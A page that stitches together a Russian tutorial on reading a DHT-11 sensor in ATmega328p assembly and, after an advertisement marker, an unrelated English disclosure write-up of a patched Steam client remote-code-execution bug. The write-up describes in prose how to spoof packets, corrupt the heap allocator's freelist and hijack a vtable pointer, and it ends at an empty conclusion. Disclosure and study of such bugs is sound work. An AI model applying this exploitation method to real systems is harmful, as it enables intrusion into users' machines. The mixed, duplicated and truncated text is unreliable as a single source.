Как программировать Arduino на ассемблере

Читаем данные с датчика температуры DHT-11 на «голом» железе Arduino Uno ATmega328p используя только ассемблер

Попробуем на простом примере рассмотреть, как можно “хакнуть” Arduino Uno и начать писать программы в машинных кодах, т.е. на ассемблере для микроконтроллера ATmega328p. На данном микроконтроллере собственно и собрана большая часть недорогих «классических» плат «duino». Данный код также будет работать на практически любой demo плате на ATmega328p и после небольших возможных доработок на любой плате Arduino на Atmel AVR микроконтроллере. В примере я постарался подойти так близко к железу, как это только возможно. Для лучшего понимания того, как работает микроконтроллер не будем использовать какие-либо готовые библиотеки, а уж тем более Arduino IDE. В качестве учебно-тренировочной задачи попробуем сделать самое простое что только возможно — правильно и полезно подергать одной ногой микроконтроллера, ну то есть будем читать данные из датчика температуры и влажности DHT-11.

Arduino очень клевая штука, но многое из того что происходит с микроконтроллером специально спрятано в дебрях библиотек и среды Arduino для того чтобы не пугать новичков. Поигравшись с мигающим светодиодом я захотел понять, как микроконтроллер собственно работает. Помимо утоления чисто познавательного зуда, знание того как работает микроконтроллер и стандартные средства общения микроконтроллера с внешним миром — это называется «периферия», дает преимущество при написании кода как для Arduino так и при написания кода на С/Assembler для микроконтроллеров а также помогает создавать более эффективные программы. Итак, будем делать все наиболее близко к железу, у нас есть: плата совместимая с Arduino Uno, датчик DHT-11, три провода, Atmel Studio и машинные коды.

Для начало подготовим нужное оборудование.

Писать код будем в Atmel Studio 7 — бесплатно скачивается с сайта производителя микроконтроллера — Atmel.

Atmel Studio 7

Весь код запускался на клоне Arduino Uno — у меня это DFRduino Uno от DFRobot, на контроллере ATmega328p работающем на частоте 16 MHz — отличная надежная плата. Каких-либо отличий от стандартного Uno в процессе эксплуатации я не заметил. Похожая чорная плата от DFBobot, только “Mega” отлетала у меня 2 года в качестве управляющего контроллера квадрокоптера — куда ее только не заносило — проблем не было.

DFRduino Uno

Для просмотра сигналов длительностью в микросекунды (а это на минутку 1 миллионная доля секунды), я использовал штуку, которая называется “логический анализатор”. Конкретно, я использовал клон восьмиканального USBEE AX Pro. Как смотреть для отладки такие быстрые процессы без осциллографа или логического анализатора — на самом деле даже не знаю, ничего посоветовать не могу.

Прежде всего я подключил свой клон Uno — как я говорил у меня это DFRduino Uno к Atmel Studio 7 и решил попробовать помигать светодиодиком на ассемблере. Как подключить описанно много где, один из примеров по ссылке в конце. Код пишется прямо в студии, прошивать плату можно через USB порт используя привычные возможности загрузчика Arduino -через AVRDude. Можно шить и через внешний программатор, я пробовал на китайском USBASP, по факту у меня оба способа работали. В обоих случаях надо только правильно настроить прошивальщик AVRDude, пример моих настроек на картинке

Полная строка аргументов:
-C “C:\avrdude\avrdude.conf” -p atmega328p -c arduino -P COM7 115200 -U flash:w:”$(ProjectDir)Debug\$(TargetName).hex:i

В итоге, для простоты я остановился на прошивке через USB порт — это стандартный способ для Arduio. На моей UNO стоит чип ATmega 328P, его и надо указать при создании проекта. Нужно также выбрать порт к которому подключаем Arduino — на моем компьютере это был COM7.

Для того, чтобы просто помигать светодиодом никаких дополнительных подключений не нужно, будем использовать светодиод, размещенный на плате и подключенный к порту Arduino D13 — напомню, что это 5-ая ножка порта «PORTB» контроллера.

Подключаем плату через USB кабель к компьютеру, пишем код в студии, прошиваем прямо из студии. Основная проблема здесь собственно увидеть это мигание, поскольку контроллер фигачит на частоте 16 MHz и, если включать и выключать светодиод такой же частотой мы увидим тускло горящий светодиод и собственно все.

Для того чтобы увидеть, когда он светится и когда он потушен, мы зажжем светодиод и займем процессор какой-либо бесполезной работой на примерно 1 секунду. Саму задержку можно рассчитать вручную зная частоту — одна команда выполняется за 1 такт или используя специальный калькулятор по ссылки внизу. После установки задержки, код выполняющий примерно то же что делает классический «Blink» Arduino может выглядеть примерно так:

      			cli
			sbi DDRB, 5	; PORT B, Pin 5 - на выход
			sbi PORTB, 5	; выставили на Pin 5 лог единицу

loop:						    ; delay 1000 ms
			ldi  r18, 82
			ldi  r19, 43
			ldi  r20, 0
L1:			dec  r20
			brne L1
			dec  r19
			brne L1
			dec  r18
			brne L1
			nop
			
			in R16, PORTB	; переключили XOR 5-ый бит в порту
			ldi R17, 0b00100000
			EOR R16, R17
			out PORTB, R16
			
			rjmp loop
еще раз — на моей плате светодиод Arduino (D13) сидит на 5 ноге порта PORTB ATmeg-и.

Но на самом деле так писать не очень хорошо, поскольку мы полностью похерили такие важные штуки как стек и вектор прерываний (о них — позже).

Ок, светодиодиком помигали, теперь для того чтобы практика работа с GPIO была более или менее осмысленной прочитаем значения с датчика DHT11 и сделаем это также целиком на ассемблере.

Для того чтобы прочитать данные из датчика нужно в правильной последовательность выставлять на рабочей линии датчика сигналы высокого и низкого уровня — собственно это и называется дергать ногой микроконтроллера. С одной стороны, ничего сложного, с другой стороны все какая-то осмысленная деятельность — меряем температуру и влажность — можно сказать сделали первый шаг к построению какой ни будь «Погодной станции» в будущем.

Забегая на один шаг вперед, хорошо бы понять, а что собственно с прочитанными данными будем делать? Ну хорошо прочитали мы значение датчика и установили значение переменной в памяти контроллера в 23 градуса по Цельсию, соответственно. Как посмотреть на эти цифры? Решение есть! Полученные данные я буду смотреть на большом компьютере выводя их через USART контроллера через виртуальный COM порт по USB кабелю прямо в терминальную программу типа PuTTY. Для того чтобы компьютер смог прочитать наши данные будем использовать преобразователь USB-TTL — такая штука которая и организует виртуальный COM порт в Windows.

Сама схема подключения может выглядеть примерно так:

Сигнальный вывод датчика подключен к ноге 2 (PIN2) порта PORTD контролера или (что то же самое) к выводу D2 Arduino. Он же через резистор 4.7 kOm “подтянут” на “плюс” питания. Плюс и минус датчика подключены — к соответствующим проводам питания. USB-TTL переходник подключен к выходу Tx USART порта Arduino, что значит PIN1 порта PORTD контроллера.

В собранном виде на breadboard:

Разбираемся с датчиком и смотрим datasheet. Сам по себе датчик несложный, и использует всего один сигнальный провод, который надо подтянуть через резистор к +5V — это будет базовый «высокий» уровень на линии. Если линия свободна — т.е. ни контроллер, ни датчик ничего не передают, на линии как раз и будет базовый «высокий» уровень. Когда датчик или контроллер что-то передают, то они занимают линию — устанавливают на линии «низкий» уровень на какое-то время. Всего датчик передает 5 байт. Байты датчик передает по очереди, сначала показатели влажности, потом температуры, завершает все контрольной суммой, это выглядит как “HHTTXX”, в общем смотрим datasheet. Пять байт — это 40 бит и каждый бит при передаче кодируется специальным образом.

Для упрощения, будет считать, что «высокий» уровень на линии — это «единица», а «низкий» соответственно «ноль». Согласно datasheet для начала работы с датчиком надо положить контроллером сигнальную линию на землю, т.е. получить «ноль» на линии и сделать это на период не менее чем 20 милсек (миллисекунд), а потом резко отпустить линию. В ответ — датчик должен выдать на сигнальную линию свою посылку, из сигналов высокого и низкого уровня разной длительности, которые кодируют нужные нам 40 бит. И, согласно datasheet, если мы удачно прочитаем эту посылку контроллером, то мы сразу поймем что: а) датчик собственно ответил, б) передал данные по влажности и температуре, с) передал контрольную сумму. В конце передачи датчик отпускает линию. Ну и в datasheet написано, что датчик можно опрашивать не чаще чем раз в секунду.

Итак, что должен сделать микроконтроллер, согласно datasheet, чтобы датчик ему ответил — нужно прижать линию на 20 миллисекунд, отпустить и быстро смотреть, что на линии:

Датчик должен ответить — положить линию в ноль на 80 микросекунд (мксек), потом отпустить на те же 80 мксек — это можно считать подтверждением того, что датчик на линии живой и откликается:

После этого, сразу же, по падению с высокого уровня на нижний датчик начинает передавать 40 отдельных бит. Каждый бит кодируются специальной посылкой, которая состоит из двух интервалов. Сначала датчик занимает линию (кладет ее в ноль) на определенное время — своего рода первый «полубит». Потом датчик отпускает линию (линия подтягивается к единице) тоже на определенное время — это типа второй «полубит». Длительность этих интервалов — «полубитов» в микросекундах кодирует что собственно пытается передать датчик: бит “ноль” или бит “единица”.

Рассмотрим описание битовой посылки: первый «полубит» всегда низкого уровня и фиксированной длительности — около 50 мксек. Длительность второго «полубита» определят, что датчик собственно передает.

Для передачи нуля используется сигнал высокого уровня длительностью 26–28 мксек:

Для передачи единицы, длительность сигнала высокого увеличивается до 70 микросекунд:

Мы не будет точно высчитывать длительность каждого интервала, нам вполне достаточно понимания, что если длительность второго «полубита» меньше чем первого — то закодирован ноль, если длительность второго «полубита» больше — то закодирована единица. Всего у нас 40 бит, каждый бит кодируется двумя импульсами, всего нам надо значит прочитать 80 интервалов. После того как прочитали 80 интервалов будем сравнить их попарно, первый “полубит” со вторым.

Вроде все просто, что же требуется от микроконтроллера для того чтобы прочитать данные с датчика? Получается нужно значит дернуть ногой в ноль, а потом просто считать всю длинную посылку с датчика на той же ноге. По ходу, будем разбирать посылку на «полу-биты», определяя где передается бит ноль, где единица. Потом соберем получившиеся биты, в байты, которые и будут ожидаемыми данными о влажности и температуре.

Ок, мы начали писать код и для начала попробуем проверить, а работает ли вообще датчик, для этого мы просто положим линию на 20 милсек и посмотрим на линии, что из этого получится логическим анализатором.

Определения:

==========		DEFINES =======================================
; определения для порта, к которому подключем DHT11			
				.EQU DHT_Port=PORTD
				.EQU DHT_InPort=PIND
				.EQU DHT_Pin=PORTD2
				.EQU DHT_Direction=DDRD
				.EQU DHT_Direction_Pin=DDD2

				.DEF Tmp1=R16
				.DEF USART_ByteR=R17		; переменная для отправки байта через USART
				.DEF Tmp2=R18
				.DEF USART_BytesN=R19		; переменная - сколько байт отправить в USART
				.DEF Tmp3=R20
				.DEF Cycle_Count=R21		; счетчик циклов в Expect_X
				.DEF ERR_CODE=R22			; возврат ошибок из подпрограмм
				.DEF N_Cycles=R23			; счетчик в READ_CYCLES
				.DEF ACCUM=R24
				.DEF Tmp4=R25

Как я уже писал сам датчик подключен на 2 ногу порта D. В Arduino Uno это цифровой выход D2 (смотрим для проверки Arduino Pinout).

Все делаем тупо: инициализировали порт на выход, выставили ноль, подождали 20 миллисекунд, освободили линию, переключили ногу в режим чтения и ждем появление сигналов на ноге.

;============	DHD11 INIT =======================================
; после инициализации сразу !!!! надо считать ответ контроллера и собственно данные
DHT_INIT:		CLI	; еще раз, на всякий случай - критичная ко времени секция

				; сохранили X для использования в READ_CYCLES - там нет времени инициализировать
				LDI XH, High(CYCLES)	; загрузили старшйи байт адреса Cycles
				LDI XL, Low (CYCLES)	; загрузили младший байт адреса Cycles

				LDI Tmp1, (1<<DHT_Direction_Pin)
				OUT DHT_Direction, Tmp1			; порт D, Пин 2 на выход

				LDI Tmp1, (0<<DHT_Pin)
				OUT DHT_Port, Tmp1			; выставили 0 

				RCALL DELAY_20MS		; ждем 20 миллисекунд

				LDI Tmp1, (1<<DHT_Pin)		; освободили линию - выставили 1
				OUT DHT_Port, Tmp1	

				RCALL DELAY_10US		; ждем 10 микросекунд

				
				LDI Tmp1, (0<<DHT_Direction_Pin)		; порт D, Pin 2 на вход
				OUT DHT_Direction, Tmp1	
				LDI Tmp1,(1<<DHT_Pin)		; подтянули pull-up вход на вместе с внешним резистором на линии
				OUT DHT_Port, Tmp1		

; ждем ответа от сенсора - он должен положить линию в ноль на 80 us и отпустить на 80 us

Смотрим анализатором — а ответил ли датчик?

Да, ответ есть — вот те сигналы после нашего первого импульса в 20 милсек — это и есть ответ датчика. Для просмотра посылки я использовал китайский клон USBEE AX Pro который подключен к сигнальному проводу датчика.

Растянем масштаб так чтобы увидеть окончание нашего импульса в 20 милсек и лучше увидеть начало посылки от датчика — смотрим все как в datasheet — сначала датчик выставил низкий/высокий уровень по 80 мксек, потом начал передавать биты — а данном случае во втором «полубите» передается «0»

Значит датчик работает и данные нам прислал, теперь надо эти данные правильно прочитать. Поскольку задача у нас учебная, то и решать ее будем тупо в лоб. В момент ответа датчика, т.е. в момент перехода с высокого уровня в низкий, мы запустим цикл с счетчиком числа повторов нашего цикла. Внутри цикла, будем постоянно следить за уровнем сигнала на ноге. Итого, в цикле будем ждать, когда сигнал на ноге перейдет обратно на высокий уровень — тем самым определив длительность сигнала первого «полубита». Наш микроконтроллер работает на частоте 16 MHz и за период например в 50 микросекунд контроллер успеет выполнить около 800 инструкций. Когда на линии появится высокий уровень — то мы из цикла аккуратно выходим, а число повторов цикла, которые мы отсчитали с использованием счетчика — запоминаем в переменную.

После перехода сигнальной линии уже на высокий уровень мы делаем такую же операцию– считаем циклы, до момента когда датчик начнет передавать следующий бит и положит линию в низкий уровень. К счастью, нам не надо знать точный временной интервал наших импульсов, нам достаточно понимать, что один интервал больше другого. Понятно, что если датчик передает бит «ноль» то длительность второго «полубита» и соответственно число циклов, которые мы отсчитали будет меньше чем длительность первого «полубита». Если же датчик передал бит «единица», то число циклов которые мы насчитаем во время второго полубита будет больше чем в первым.

И для того что бы мы не висели вечно, если вдруг датчик не ответил или засбоил, сам цикл мы будем запускать на какой-то временной период, но который гарантированно больше самой длинной посылки, чтоб если датчик не ответил, то мы смогли выйти по тайм-ауту.

В данном случае показан пример для ситуации, когда у нас на линии был ноль, и мы считаем сколько раз мы в цикле мы считали состояние ноги контроллера, пока датчик не переключил линию в единицу.

;=============	EXPECT 1 =========================================
; крутимся в цикле ждем нужного состояния на пине
; когда появилось - выходим
; сообщаем сколько циклов ждали
; или сообщение об ошибке тайм оута если не дождались
EXPECT_1:		LDI Cycle_Count, 0			; загрузили счетчик циклов
			LDI ERR_CODE, 2			; Ошибка 2 - выход по тайм Out

			ldi  Tmp1, 2			; Загрузили 
			ldi  Tmp2, 169			; задержку 80 us

EXP1L1:			INC Cycle_Count			; увеличили счетчик циклов

			IN Tmp3, DHT_InPort		; читаем порт
			SBRC Tmp3, DHT_Pin	; Если 1 
			RJMP EXIT_EXPECT_1	; То выходим
			dec  Tmp2			; если нет то крутимся в задержке
			brne EXP1L1
			dec  Tmp1
			brne EXP1L1
			NOP					; Здесь выход по тайм out
			RET

EXIT_EXPECT_1:		LDI ERR_CODE, 1			; ошибка 1, все нормально, в Cycle_Count счетчик циклов
			RET

Аналогичная подпрограмма используется для того, чтобы посчитать сколько циклов у нас должно прокрутиться, пока датчик из состояния ноль на линии переложил линию в состояние единицы.

Для расчета временных задержек мы будет использовать тот же подход, который мы использовали при мигании светодиодом — подберем параметры пустого цикла для формирования нужной паузы. Я использовал специальный калькулятор. При желании можно посчитать число рабочих инструкций и вручную.

Памяти в нашем контроллере довольно много — аж 2 (Два) килобайта, так что мы не будем жлобствовать с памятью, и тупо сохраним данные счетчиков относительно наших 80 ( 40 бит, 2 интервала на бит) интервалов в память.

Объявим переменную

CYCLES: .byte 80 ; буфер для хранения числа циклов

И сохраним все считанные циклы в память.

;============== READ CYCLES ====================================
; читаем биты контроллера и сохраняем в Cycles 
READ_CYCLES:	LDI N_Cycles, 80			; читаем 80 циклов
READ:		NOP
		RCALL EXPECT_1				; Открутился 0
		ST X+, Cycles_Counter			; Сохранили число циклов 
			
		RCALL EXPECT_0
		ST X+, Cycles_Counter			; Сохранили число циклов 
		
		DEC N_Cycles				; уменьшили счетчик
		BRNE READ					
		RET					; все циклы считали

Теперь, для отладки, попробуем посмотреть насколько удачно посчиталось длительность интервалов и понять действительно ли мы считали данные из датчика. Понятно, что число отсчитанных циклов первого «полубита» должно быть примерно одинаково у всех битовых посылок, а вот число циклов при отсчете второго «полубита» будет или существенно меньше, или наоборот существенно больше.

Для того чтобы передавать данные в большой компьютер будем использовать USART контроллера, который через USB кабель будет передавать данные в программу — терминал, например PuTTY. Передаем опять же тупо в лоб — засовываем байт в нужный регистр управления USART-а и ждем, когда он передастся. Для удобства я также использовал пару подпрограмм, типа — передать несколько байт, начиная с адреса в Y, ну и перевести каретку в терминале для красоты.

;============	SEND 1 BYTE VIA USART =====================
SEND_BYTE:	NOP
SEND_BYTE_L1:	LDS Tmp1, UCSR0A
		SBRS Tmp1, UDRE0			; если регистр данных пустой
		RJMP SEND_BYTE_L1
		STS UDR0, USART_ByteR		; то шлем байт из R17
		NOP
		RET				

;============	SEND CRLF VIA USART ===============================
SEND_CRLF:	LDI USART_ByteR, $0D
		RCALL SEND_BYTE	
		LDI USART_ByteR, $0A
		RCALL SEND_BYTE
		RET			

;============	SEND N BYTES VIA USART ============================
; Y - что слать, USART_BytesN - сколько байт
SEND_BYTES:	NOP
SBS_L1:		LD USART_ByteR, Y+
		RCALL SEND_BYTE
		DEC USART_BytesN
		BRNE SBS_L1
		RET

Отправив в терминал число отсчётов для 80 интервалов, можно попробовать собрать собственно значащие биты. Делать будем как написано в учебнике, т.е. в datasheet — попарно сравним число циклов первого «полубита» с числом циклов второго. Если вторые пол-бита короче — значит это закодировать ноль, если длиннее — то единица. После сравнения биты накапливаем в аккумуляторе и сохраняем в память по-байтово начиная с адреса BITS.

;=============	GET BITS ===============================================
; Из Cycles делаем байты в  BITS				
GET_BITS:			LDI Tmp1, 5			; для пяти байт - готовим счетчики
				LDI Tmp2, 8			; для каждого бита
				LDI ZH, High(CYCLES)	; загрузили старшйи байт адреса Cycles
				LDI ZL, Low (CYCLES)	; загрузили младший байт адреса Cycles
				LDI YH, High(BITS)	; загрузили старший байт адреса BITS
				LDI YL, Low (BITS)	; загрузили младший байт адреса BITS

ACC:				LDI ACCUM, 0			; акамулятор инициализировали
				LDI Tmp2, 8			; для каждого бита

TO_ACC:				LSL ACCUM				; сдвинули влево
				LD Tmp3, Z+			; считали данные [i]
				LD Tmp4, Z+			; о циклах и [i+1]
				CP Tmp3, Tmp4			; сравнить первые пол бита с второй половину бита если положительно - то BITS=0, если отрицительно то BITS=1
				BRPL J_SHIFT		; если положительно (0) то просто сдвиг	
				ORI ACCUM, 1			; если отрицательно (1) то добавили 1
J_SHIFT:			DEC Tmp2				; повторить для 8 бит
				BRNE TO_ACC
				ST Y+, ACCUM			; сохранили акамулятор
				DEC Tmp1				; для пяти байт
				BRNE ACC
				RET

Итак, здесь мы собрали в памяти начиная с метки BITS те пять байт, которые передал контроллер. Но работать с ними в таком формате не очень неудобно, поскольку в памяти это выглядит примерно, как:
34002100ХХ, где 34 — это влажность целая часть, 00 — данные после запятой влажности, 21 — температура, 00 — опять данные после запятой температуры, ХХ — контрольная сумма. А нам надо бы вывести в терминал красиво типа «Temperature = 21.00». Так что для удобства, растащим данные по отдельным переменным.

Определения

H10:			.byte 1		; чиcло - целая часть влажность
H01:			.byte 1		; число - дробная часть влажность
T10:			.byte 1		; число - целая часть температура в C
T01:			.byte 1		; число - дробная часть температура

И сохраняем байты из BITS в нужные переменные

;============	GET HnT DATA =========================================
; из BITS вытаскиваем цифры H10...
; !!! чуть хакнули, потому что H10 и дальше... лежат последовательно в памяти

GET_HnT_DATA:	NOP

				LDI ZH, HIGH(BITS)
				LDI ZL, LOW(BITS)
				LDI XH, HIGH(H10)
				LDI XL, LOW(H10)
												; TODO - перевести на счетчик таки
				LD Tmp1, Z+			; Считали
				ST X+, Tmp1			; сохранили
				
				LD Tmp1, Z+			; Считали
				ST X+, Tmp1			; сохранили

				LD Tmp1, Z+			; Считали
				ST X+, Tmp1			; сохранили

				LD Tmp1, Z+			; Считали
				ST X+, Tmp1			; сохранили

				RET

После этого преобразуем цифры в коды ASCII, чтобы данные можно было нормально прочитать в терминале, добавляем названия данных, ну там «температура» из флеша и шлем в COM порт в терминал.

PuTTY с данными

Для того, чтобы это измерять температуру регулярно добавляем вечный цикл с задержкой порядка 1200 миллисекунд, поскольку datasheet DHT11 говорит, что не рекомендуется опрашивать датчик чаще чем 1 раз в секунду.

Основной цикл после этого выглядит примерно так:

;============	MAIN
			;!!! Главный вход
RESET:			NOP		

			; Internal Hardware Init
			CLI		; нам прерывания не нужны пока
				
			; stack init		
			LDI Tmp1, Low(RAMEND)
			OUT SPL, Tmp1
			LDI Tmp1, High(RAMEND)
			OUT SPH, Tmp1

			RCALL USART0_INIT

			; Init data
			RCALL COPY_STRINGS		; скопировали данные в RAM
			RCALL TEST_DATA			; подготовили тестовые данные

loop:				NOP						; крутимся в вечном цикле ....
				; External Hardware Init
				RCALL DHT_INIT
				; получили здесь подтверждение контроллера и надо в темпе читать биты
				RCALL READ_CYCLES
				; критичная ко времени секция завершилась...
				
				;Тест - отправить Cycles в USART		
				;RCALL TEST_CYCLES
				
				; получаем из посылки биты
				RCALL GET_BITS
				
				;Тест - отправить BITS в USART
				;RCALL TEST_BITS  
				
				; получаем из BITS цифровые данные
				RCALL GET_HnT_DATA
				
				;Тест - отправить 4 байта начиная с H10 в USART
				;RCALL TEST_H10_T01
				
				; подготовидли температуру и влажность в ASCII		
				RCALL HnT_ASCII_DATA_EX
				
				; Отправить готовую температуру (надпись и ASCII данные) в USART
				RCALL PRINT_TEMPER
				; Отправить готовую влажность (надпись и ASCII данные) в USART
				RCALL PRINT_HUMID
				; переведем строку дял красоты				
				RCALL SEND_CRLF
							
				RCALL DELAY_1200MS				;повторяем каждые 1.2 секунды 
				rjmp loop		; зациклились

Прошиваем, подключаем USB-TTL кабель (преобразователь)к компьютеру, запускаем терминал, выбираем правильный виртуальный COM порта и наслаждаемся нашим новым цифровым термометром. Для проверки можно погреть датчик в руке — у меня температура при этом растет, а влажность как ни странно уменьшается.

Ссылки по теме:
AVR Delay Calc
Как подключить Arduino для программирования в Atmel Studio 7
DHT11 Datasheet
ATmega DataSheet
Atmel AVR 8-bit Instruction Set
Atmel Studio
Код примера на github

Реклама

Remote Code Execution Vulnerability in the Steam Client

Remote Code Execution Vulnerability in the Steam Client

Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client

Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client

This blog post explains the story behind a bug which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.

The keen-eyed, security conscious PC gamers amongst you may have noticed that Valve released a new update to the Steam client in recent weeks.
This blog post aims to justify why we play games in the office explain the story behind the corresponding bug, which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.
Since July, when Valve (finally) compiled their code with modern exploit protections enabled, it would have simply caused a client crash, with RCE only possible in combination with a separate info-leak vulnerability.
Our vulnerability was reported to Valve on the 20th February 2018 and to their credit, was fixed in the beta branch less than 12 hours later. The fix was pushed to the stable branch on the 22nd March 2018.

Overview

At its core, the vulnerability was a heap corruption within the Steam client library that could be remotely triggered, in an area of code that dealt with fragmented datagram reassembly from multiple received UDP packets.

The Steam client communicates using a custom protocol – the “Steam protocol” – which is delivered on top of UDP. There are two fields of particular interest in this protocol which are relevant to the vulnerability:

  • Packet length
  • Total reassembled datagram length

The bug was caused by the absence of a simple check to ensure that, for the first packet of a fragmented datagram, the specified packet length was less than or equal to the total datagram length. This seems like a simple oversight, given that the check was present for all subsequent packets carrying fragments of the datagram.

Without additional info-leaking bugs, heap corruptions on modern operating systems are notoriously difficult to control to the point of granting remote code execution. In this case, however, thanks to Steam’s custom memory allocator and (until last July) no ASLR on the steamclient.dll binary, this bug could have been used as the basis for a highly reliable exploit.

What follows is a technical write-up of the vulnerability and its subsequent exploitation, to the point where code execution is achieved.

Vulnerability Details

PREREQUISITE KNOWLEDGE

Protocol

The Steam protocol has been reverse engineered and well documented by others (e.g. https://imfreedom.org/wiki/Steam_Friends) from analysis of traffic generated by the Steam client. The protocol was initially documented in 2008 and has not changed significantly since then.

The protocol is implemented as a connection-orientated protocol over the top of a UDP datagram stream. The packet structure, as documented in the existing research linked above, is as follows:

Key points:

  • All packets start with the 4 bytes “VS01
  • packet_len describes the length of payload (for unfragmented datagrams, this is equal to data length)
  • type describes the type of packet, which can take the following values:
    • 0x2 Authenticating Challenge
    • 0x4 Connection Accept
    • 0x5 Connection Reset
    • 0x6 Packet is a datagram fragment
    • 0x7 Packet is a standalone datagram
  • The source and destination fields are IDs assigned to correctly route packets from multiple connections within the steam client
  • In the case of the packet being a datagram fragment:
    • split_count refers to the number of fragments that the datagram has been split up into
    • data_len refers to the total length of the reassembled datagram
  • The initial handling of these UDP packets occurs in the CUDPConnection::UDPRecvPkt function within steamclient.dll

Encryption

The payload of the datagram packet is AES-256 encrypted, using a key negotiated between the client and server on a per-session basis. Key negotiation proceeds as follows:

  • Client generates a 32-byte random AES key and RSA encrypts it with Valve’s public key before sending to the server.
  • The server, in possession of the private key, can decrypt this value and accepts it as the AES-256 key to be used for the session
  • Once the key is negotiated, all payloads sent as part of this session are encrypted using this key.

VULNERABILITY

The vulnerability exists within the RecvFragment method of the CUDPConnection class. No symbols are present in the release version of the steamclient library, however a search through the strings present in the binary will reveal a reference to “CUDPConnection::RecvFragment” in the function of interest. This function is entered when the client receives a UDP packet containing a Steam datagram of type 0x6 (Datagram fragment).

1. The function starts by checking the connection state to ensure that it is in the “Connected” state.
2. The data_len field within the Steam datagram is then inspected to ensure it contains fewer than a seemingly arbitrary 0x20000060 bytes.
3. If this check is passed, it then checks to see if the connection is already collecting fragments for a particular datagram or whether this is the first packet in the stream.

Figure 1

4. If this is the first packet in the stream, the split_count field is then inspected to see how many packets this stream is expected to span
5. If the stream is split over more than one packet, the seq_no_of_first_pkt field is inspected to ensure that it matches the sequence number of the current packet, ensuring that this is indeed the first packet in the stream.
6. The data_len field is again checked against the arbitrary limit of 0x20000060 and also the split_count is validated to be less than 0x709bpackets.

Figure 2

7. If these assertions are true, a Boolean is set to indicate we are now collecting fragments and a check is made to ensure we do not already have a buffer allocated to store the fragments.

Figure 3

8. If the pointer to the fragment collection buffer is non-zero, the current fragment collection buffer is freed and a new buffer is allocated (see yellow box in Figure 4 below). This is where the bug manifests itself. As expected, a fragment collection buffer is allocated with a size of data_lenbytes. Assuming this succeeds (and the code makes no effort to check – minor bug), then the datagram payload is then copied into this buffer using memmove, trusting the field packet_len to be the number of bytes to copy. The key oversight by the developer is that no check is made that packet_len is less than or equal to data_len. This means that it is possible to supply a data_len smaller than packet_len and have up to 64kb of data (due to the 2-byte width of the packet_len field) copied to a very small buffer, resulting in an exploitable heap corruption.

Figure 4

Exploitation

This section assumes an ASLR work-around is present, leading to the base address of steamclient.dll being known ahead of exploitation.

SPOOFING PACKETS

In order for an attacker’s UDP packets to be accepted by the client, they must observe an outbound (client->server) datagram being sent in order to learn the client/server IDs of the connection along with the sequence number. The attacker must then spoof the UDP packet source/destination IPs and ports, along with the client/server IDs and increment the observed sequence number by one.

MEMORY MANAGEMENT

For allocations larger than 1024 (0x400) bytes, the default system allocator is used. For allocations smaller or equal to 1024 bytes, Steam implements a custom allocator that works in the same way across all supported platforms. In-depth discussion of this custom allocator is beyond the scope of this blog, except for the following key points:

  1. Large blocks of memory are requested from the system allocator that are then divided into fixed-size chunks used to service memory allocation requests from the steam client.
  2. Allocations are sequential with no metadata separating the in-use chunks.
  3. Each large block maintains its own freelist, implemented as a singly linked list.
  4. The head of the freelist points to the first free chunk in a block, and the first 4-bytes of that chunk points to the next free chunk if one exists.

Allocation

When a block is allocated, the first free block is unlinked from the head of the freelist, and the first 4-bytes of this block corresponding to the next_free_block are copied into the freelist_head member variable within the allocator class.

Deallocation

When a block is freed, the freelist_head field is copied into the first 4 bytes of the block being freed (next_free_block), and the address of the block being freed is copied into the freelist_head member variable within the allocator class.

ACHIEVING A WRITE-WHAT-WHERE PRIMITIVE

The buffer overflow occurs in the heap, and depending on the size of the packets used to cause the corruption, the allocation could be controlled by either the default Windows allocator (for allocations larger than 0x400 bytes) or the custom Steam allocator (for allocations smaller than 0x400 bytes). Given the lack of security features of the custom Steam allocator, I chose this as the simpler of the two to exploit.

Referring back to the section on memory management, it is known that the head of the freelist for blocks of a given size is stored as a member variable in the allocator class, and a pointer to the next free block in the list is stored as the first 4 bytes of each free block in the list.

The heap corruption allows us to overwrite the next_free_block pointer if there is a free block adjacent to the block that the overflow occurs in. Assuming that the heap can be groomed to ensure this is the case, the overwritten next_free_block pointer can be set to an address to write to, and then a future allocation will be written to this location.

USING DATAGRAMS VS FRAGMENTS

The memory corruption bug occurs in the code responsible for processing datagram fragments (Type 6 packets). Once the corruption has occurred, the RecvFragment() function is in a state where it is expecting more fragments to arrive. However, if they do arrive, a check is made to ensure:

fragment_size + num_bytes_already_received < sizeof(collection_buffer)

This will obviously not be the case, as our first packet has already violated that assertion (the bug depends on the omission of this check) and an error condition will be raised. To avoid this, the CUDPConnection::RecvFragment() method must be avoided after memory corruption has occurred.

Thankfully, CUDPConnection::RecvDatagram() is still able to receive and process type 7 (Datagram) packets sent whilst RecvFragment() is out of action and can be used to trigger the write primitive.

THE ENCRYPTION PROBLEM

Packets being received by both RecvDatagram() and RecvFragment() are expected to be encrypted. In the case of RecvDatagram(), the decryption happens almost immediately after the packet has been received. In the case of RecvFragment(), it happens after the last fragment of the session has been received.

This presents a problem for exploitation as we do not know the encryption key, which is derived on a per-session basis. This means that any ROP code/shellcode that we send down will be ‘decrypted’ using AES256, turning our data into junk. It is therefore necessary to find a route to exploitation that occurs very soon after packet reception, before the decryption routines have a chance to run over the payload contained in the packet buffer.

ACHIEVING CODE EXECUTION

Given the encryption limitation stated above, exploitation must be achieved before any decryption is performed on the incoming data. This adds additional constraints, but is still achievable by overwriting a pointer to a CWorkThreadPool object stored in a predictable location within the data section of the binary. While the details and inner workings of this class are unclear, the name suggests it maintains a pool of threads that can be used when ‘work’ needs to be done. Inspecting some debug strings within the binary, encryption and decryption appear to be two of these work items (E.g. CWorkItemNetFilterEncryptCWorkItemNetFilterDecrypt), and so the CWorkThreadPool class would get involved when those jobs are queued. Overwriting this pointer with a location of our choice allows us to fake a vtable pointer and associated vtable, allowing us to gain execution when, for example, CWorkThreadPool::AddWorkItem() is called, which is necessarily prior to any decryption occurring.

Figure 5 shows a successful exploitation up to the point that EIP is controlled.

Figure 5

From here, a ROP chain can be created that leads to execution of arbitrary code. The video below demonstrates an attacker remotely launching the Windows calculator app on a fully patched version of Windows 10.

Conclusion

